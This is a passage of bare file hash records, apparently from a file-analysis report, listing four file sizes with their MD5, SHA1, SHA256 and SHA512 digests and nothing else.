SHA5125264519a107cc2cbc0bdbe99ba0ae96bba9d5480fb484b5b8c4542b8bd64b3204ba669063711d38c087c6752457e668f6d45dfa804512fefd2063f241f8fa65b
-
Filesize
10.5MB
MD500a1864355a5ea47902e5757c0d87fd9
SHA14be5647308e0925fb00fae068cb4a89a8a449afc
SHA2564289002fd7528974ae7a9bf4d855bfd3812d248a46dbd7f94e7336f260ae7a39
SHA5127f86e42676cfd77aafd7a030656ad88d041ba54edc6eab41193528b03e79850f89e7d79679e6a14fff8e69d7011e36e03d09c73a46e8fc722dc126c3da4be718
-
Filesize
13KB
MD56557bd5240397f026e675afb78544a26
SHA1839e683bf68703d373b6eac246f19386bb181713
SHA256a7fecfc225dfdd4e14dcd4d1b4ba1b9f8e4d1984f1cdd8cda3a9987e5d53c239
SHA512f2399d34898a4c0c201372d2dd084ee66a66a1c3eae949e568421fe7edada697468ef81f4fcab2afd61eaf97bcb98d6ade2d97295e2f674e93116d142e892e97
-
Filesize
5.2MB
MD587c3dd67bfa3009d89f7b45b01d705b8
SHA17eb74405565dd5971298b2a2c8de9116d08db2d5
SHA25692722d28951672263b79cd30eb975d770cfd5bd5ff53344fd329546fb950f155
SHA512c79f10712bb505d3645c9fdf8ef11bd787ab327fc2f176302de71b5d4a886026e46e40338a5db964e4b42bd152f3279fda8f2f842f99876bee1b0783d2f74e0e
-
Filesize
5.2MB
MD5154202154e41175e801a698ca940eb0c
SHA16ce074d67c91cb00016cb1095319b00afab396a8
SHA2560612bfb5a51b0b413ba960f7d52bc647bd4cf7530fd760c0d6006aa829e806e2
SHA5127d0a7474c28b87972fb02a48ee56a2549765a584a53abbd123631e142a655b17f3508b7d3c2b90f3174d118940143af12728355900472f27fe8280aa11a8f540